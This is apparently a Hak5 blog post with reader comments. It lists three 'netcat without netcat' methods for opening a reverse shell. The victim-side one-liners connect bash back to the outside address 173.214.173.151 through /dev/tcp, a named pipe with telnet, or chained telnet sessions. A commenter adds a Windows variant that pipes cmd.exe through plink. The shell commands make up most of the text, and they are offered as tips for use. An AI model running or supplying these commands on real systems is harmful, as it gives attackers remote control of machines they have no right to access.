Method 1:
Hacker: nc -l -n -vv -p 8080
Victim: /bin/bash -i > /dev/tcp/173.214.173.151/8080 0<&1 2>&1
Method 2:
Hacker: nc -l -n -vv -p 8080
Victim: mknod backpipe p && telnet 173.214.173.151 8080 0backpipe
Method 3:
Hacker: nc -l -n -vv -p 8080
Hacker: nc -l -n -vv -p 8888
Victim: telnet 173.214.173.151 8080 | /bin/bash | telnet 173.214.173.151 8888
So that leads me to ask, what programs, commands or scripts are rocking your world? Hit us up -- tips@hak5.org, or simply leave a comment below.
And be sure to check out our sister show, Hak5 for more great stuff just like this.




Is there any Netcat without Netcat for Windows? ..nice show
Hey sheep!
Telnet is not installed on my Windows machine, so I did it with plink which is the command line version of PuTTY.
So it might be a litte bit different with the normal telnet.
plink 173.214.173.151 -P 8080 -telnet | cmd.exe | plink 173.214.173.151 -P 8888 -telnet
@Lares0: you can install it from Add/Remove Window’s Addons / component
Available on Windows XP/Vista/7/8
- Very nicely done, thanks for sharing. – I love the new green-screen look to the show, makes the show much easier to watch and follow the examples. Nice going Darren, you certainly have gone from Dweeb To Adonis! /Ojos